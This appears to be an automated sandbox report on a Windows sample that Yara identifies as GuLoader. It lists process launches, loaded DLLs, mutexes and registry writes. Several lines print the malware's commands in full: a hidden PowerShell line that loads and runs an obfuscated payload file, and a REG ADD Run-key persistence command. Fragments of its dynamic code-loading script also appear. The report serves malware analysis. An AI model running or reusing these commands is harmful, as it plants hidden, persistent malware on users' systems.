Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0305EAE0	2_2_0305EAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_030599A8	2_2_030599A8

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324

Source: zR4aIjCuRs.exe, 00000000.00000000.273486426028.000000000047F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameemblem cytocyst.exe< vs zR4aIjCuRs.exe
Source: zR4aIjCuRs.exe	Binary or memory string: OriginalFilenameemblem cytocyst.exe< vs zR4aIjCuRs.exe
Source: zR4aIjCuRs.exe.2.dr	Binary or memory string: OriginalFilenameemblem cytocyst.exe< vs zR4aIjCuRs.exe

Source: zR4aIjCuRs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/23@4/3

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

0_2_0040338F

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404722

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

File created: C:\Users\user\AppData\Roaming\determinationens

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1264
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-MK0QHY

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

File created: C:\Users\user\AppData\Local\Temp\nsj3DBD.tmp

Jump to behavior

Source: zR4aIjCuRs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zR4aIjCuRs.exe	ReversingLabs: Detection: 79%
Source: zR4aIjCuRs.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

File read: C:\Users\user\Desktop\zR4aIjCuRs.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zR4aIjCuRs.exe "C:\Users\user\Desktop\zR4aIjCuRs.exe"
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"	Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: zR4aIjCuRs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: CallSite.Targetore.pdb\|j source: powershell.exe, 00000002.00000002.274414428126.0000000008AB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.274416296042.000000000A9BD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Forureningsforebygget $Execrative $Erotema), (Radiator @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tvangsakkordens = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Precandidacy)), $Couniversal).DefineDynamicModule($Begrebsforvirringer, $false).DefineType($Shutoff, $Farvemssige, [System.MulticastDe

Suspicious powershell command line found

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_030585B8 push eax; mov dword ptr [esp], edx	2_2_030585CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03051E1B pushad ; ret	2_2_03051E4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03051D72 pushad ; ret	2_2_03051D9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FC4549 push 8BD38B50h; iretd	2_2_08FC454E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tragacanth			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tragacanth			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
